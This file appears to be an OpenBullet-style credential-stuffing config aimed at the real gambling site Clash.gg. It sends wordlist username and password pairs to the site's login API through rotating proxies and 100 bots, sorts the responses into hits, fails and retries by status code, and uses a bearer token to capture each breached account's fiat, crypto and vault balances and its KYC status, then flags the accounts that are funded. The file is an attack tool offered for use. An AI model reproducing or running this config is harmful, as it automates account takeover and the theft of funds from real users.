[SETTINGS]
{
  "Name": "Clash.gg",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-08-01T03:33:33.3333333-07:00",
  "AdditionalInfo": "github.com/0xSums",
  "RequiredPlugins": [],
  "Author": "✧",
  "Version": "[t.me/imSums]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Default",
  "AllowedWordlist2": "Email",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Clash.gg",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#/auth/login REQUEST POST "https://clash.gg/api/auth/login" ReadResponseSource=FALSE 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 

#200_OK? KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" EqualTo "400" 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" EqualTo "201" 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" EqualTo "403" 

#/access-token REQUEST GET "https://clash.gg/api/auth/access-token" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "X-Made-With: fetch" 

#accessToken PARSE "<SOURCE>" JSON "accessToken" -> VAR "A" 

#/user/me REQUEST GET "https://clash.gg/api/user/me" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Authorization: Bearer <A>" 

#name PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "Username" 

#countryCode PARSE "<SOURCE>" JSON "countryCode" CreateEmpty=FALSE -> CAP "Country" 

#balance PARSE "<SOURCE>" JSON "balance" CreateEmpty=FALSE -> CAP "Balance" 

#balanceFiat PARSE "<SOURCE>" JSON "balanceFiat" CreateEmpty=FALSE -> CAP "Fiat" 

#balanceCrypto PARSE "<SOURCE>" JSON "balanceCrypto" CreateEmpty=FALSE -> CAP "Crypto" 

#balanceVault PARSE "<SOURCE>" JSON "balanceVault" CreateEmpty=FALSE -> CAP "Vault" 

#kycStatus PARSE "<SOURCE>" JSON "kycStatus" CreateEmpty=FALSE -> CAP "KYC" 

#TotalBalance FUNCTION Compute "<Balance>+<Fiat>+<Crypto>+<Vault>" -> VAR "TB" 

#$? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<TB>" EqualTo "0" 